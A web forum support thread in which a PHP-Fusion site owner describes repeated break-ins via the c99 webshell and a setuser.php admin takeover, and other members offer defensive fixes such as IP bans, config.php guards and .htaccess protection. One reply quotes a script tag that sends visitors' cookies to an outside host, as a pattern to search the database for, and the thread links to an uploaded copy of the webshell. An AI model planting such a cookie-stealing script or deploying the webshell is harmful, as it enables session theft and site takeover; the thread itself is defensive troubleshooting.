Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Sign In
Not a member yet? Click here to register.

Site hacked! help find the reason and how to prevent it.

I seem to have had a few of these over the last few days, is it anything to worry about?

ACCESSED PAGE
http://www.01243.co.uk/infusions/guestbook/guestbook.php?rowstart=30

http://www.01243.co.uk/setuser.php?error=3
REFFERRING PAGE
http://www.01243.co.uk/infusions/guestbook/guestbook.php?rowstart=100&&DI=293&IG=4748c5f020264f7fb5741b30165b93e6&POS=54&CM=WPU&CE=54&CS=AWP&SR=54

210.123.182.13
ACCESSED PAGE
http://www.01243.co.uk/infusions/guestbook/guestbook.php
REFFERRING PAGE
http://www.01243.co.uk/infusions/guestbook/guestbook.php?rowstart=100&&DI=293&IG=4748c5f020264f7fb5741b30165b93e6&POS=54&CM=WPU&CE=54&CS=AWP&SR=54
USER AGENT DETAILS
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
This is also a way to block ip's:

CodeDownload  

$ip_banned=array("255.255.255.255","0.0.0.0");  // IP's that are banned..
$ip = $_SERVER['REMOTE_ADDR']; // User IP-adress
foreach($ip_banned as $value) {
if($value==$ip) die("Your banned!");
}



Write in your chosen ip adress to ban. Put the code in theme.php
@Elactos : Or do it via blacklist using a better way :)
well the site got hacked again today and i exactly have no idea what to do next... i emailed the hacker asking for the bug he's using to hack the site... and gonna stop working on the site till i find the error (don't want my time and work to be wasted everyday he hacks the site). is there any known exploit in v6.01.6 ? he seems to be able to easily hack my account. i think it may be by creating a fake cookie and making the system think it's the admin... not sure though but i'm sure he doesn't and can't hack the cpanel and is getting the mysql pass from the files in the site... do you think encoding the config.php file using programs like phtml encoder can help?
ask your provider for help. maybe this is a security hole somewhere and other accounts are hacked, too. if so, it's not a php fusion issue. if not, hm...
Do you have a keylogger on your computer, is your computer safe, is your host safe???

Theres many things that could be causing this.

Quote

agl wrote:
well the site got hacked again today and i exactly have no idea what to do next... i emailed the hacker asking for the bug he's using to hack the site... and gonna stop working on the site till i find the error (don't want my time and work to be wasted everyday he hacks the site). is there any known exploit in v6.01.6 ? he seems to be able to easily hack my account. i think it may be by creating a fake cookie and making the system think it's the admin... not sure though but i'm sure he doesn't and can't hack the cpanel and is getting the mysql pass from the files in the site... do you think encoding the config.php file using programs like phtml encoder can help?

Hello, agl,

does the hacker still upload the webshell (the file c99.php)?

It's strange that he changed your changed your mysql, and cpanel password.

If the hacker does all the job with webshells, I will try to help you stop getting webshells in your ftp.

And.. did you try putting webshell c99.php into your ftp, open it in your browser, and try see if it allows to browse server's system files etc. Maybe the server is not secure?

Quote

do you think encoding the config.php file using programs like phtml encoder can help?[

But you can decode it. :| but encoding may help.

There is a way to view config.php file in php-fusion administration (Panels and Custom Pages). To stop it, try editing your config.php and maincore.php files:

In config.php file put this line after <?php:
CodeDownload  
foreach (explode("/",$PHP_SELF) As $d) {if ($d == "config.php") {header("Location: index.php");}}



Do the same in Maincore.php but use this line:
CodeDownload  
foreach (explode("/",$PHP_SELF) As $d) {if ($d == "maincore.php") {header("Location: index.php");}}




Config.php file should look like this:
CodeDownload  
<?php
foreach (explode("/",$PHP_SELF) As $d) {if ($d == "config.php") {header("Location: index.php");}}
// database settings
$db_host="***";
$db_user="***";
$db_pass="***";
$db_name="***";
$db_prefix="***";
define("DB_PREFIX", "***");
?>



--------------------------------
But it won't help you to protect config.php if hacker views it in webshell. To stop hacker accessing your files with webshell, try to contact you webhosting, ask what chmod (file attributes) you should use (if there is any) to stop accesing your files with webshell, but keep the site working.
------------------------------------
Make sure that you updated your profile.php (http://php-fusion.co.uk/news.php?read...admore=361)

P.S. don't forget to answer my question:
does the hacker still upload the webshell (the file c99.php)?
thanks a lot for your help Zilvinas, he used the c99.php file only the first time. the next times just went to "/setuser.php?error=3" and "/setuser.php?user=agl" and then administration etc. (he checked to see if c99.php is there but got 404 error...)

and i uploaded the c99.php to the server and run it and wow... i was laughing for a while about how easy and future-rich that script is... i better stop using cpanel's filemanager and start using that script instead... it has a file manager you can view (even in hexdump) download, delete etc the files. nice interface! you can do different attacks etc though i'm not sure how they work. i didn't know hackers use such scripts... always thought they sit at their comp looking at difficult codes and hack a site... anyway.
you can view that script by going here:
http://www.hentai-enishi.com/forum/attachments/c99.php (please don't delete my files and don't hack the server ;) )

please anyone can tell me what i should do to stop these kind of attack?

and again the hacker only used the c99.php file the first time. he hacked 3-4 times by now and just used it the first time. not sure if he changed something else the first time in order to hack it again though...

i removed that file from attachment since it's a dangrous script :D
btw i know the server admin so if you think something should be changed in the server settings let me know. and i'm thinking the best way is to ask the admin to delete this account and make a new one for me from scratch... tell me if you have any other idea. thanks in advance
Yes try to make a new account, check all files (or upload new php-fusion and restore database.). Maybe the hacker spread the c99 webshell around your ftp so he doesn't need to upload it again to /forum/attachments. I checked the directories (with your c99.) that has 777 attributes, but didn't find it.

Maybe he put the c99 webshell into your's ftp, then looked at your config.php and connected to mysql database and put some sniffer codes into your site's panels, news etc. that he doesn't need to put the c99 again.

Well you can think of many versions how he hacked your site.

So I recommend you:
Check panels, latest news (or open your whole mysql DB in txt) if there is no codes like that:
CodeDownload  
<script>img = new Image(); img.src = "http://www.website.com/s/s.jpg?"+document.cookie;</script>



Also I will translate article from my site to english, about .htaccess protection. And locking the Admin Panel. (To stop getting webshells). I will put the link here today. And don't create new hosting account if you didn't put the .htaccess files that I will give you. After creating hosting account and putting .htaccess files we will see if he can still hack into your website
php-fusion.co.uk/images/smiley/shock.gif
i checked my db backup and there's no code like that in it. looking forward to your .htaccess files. for now i've removed the c99 file from the server. will take backup of my download files and ask the host to delete this account.
btw here's the hacking thread of my site from the hacker's website (hcegroup):
https://hcegroup.vn/forums/showthread.php?t=1590
if someone can understand what the bug is from that site please let me know ;)
I think they speak in vietnamese language. We should get a translator. I tried to google it but no luck, most of companies are translating for money.
np. thanks a lot for your help ;)
I see, site is back again. Was there any more hacking attempts? If you use .htaccess files that I given you, still check forum/attachments; images/avatars, for .php files regularly, just to know if they try to do something. If your site will be hacked again, say it here, I would like to know it.
I hope it won't get hacked again. Good luck with your site!
Thread Information
Author
Replies
35 posts
Views
10,229 times
Last Post
Last updated on 13 years ago
You can view all discussion threads in this forum.
You can start a new discussion thread in this forum.
You cannot reply in this discussion thread.
You cannot start on a poll in this forum.
You cannot upload attachments in this forum.
You cannot download attachments in this forum.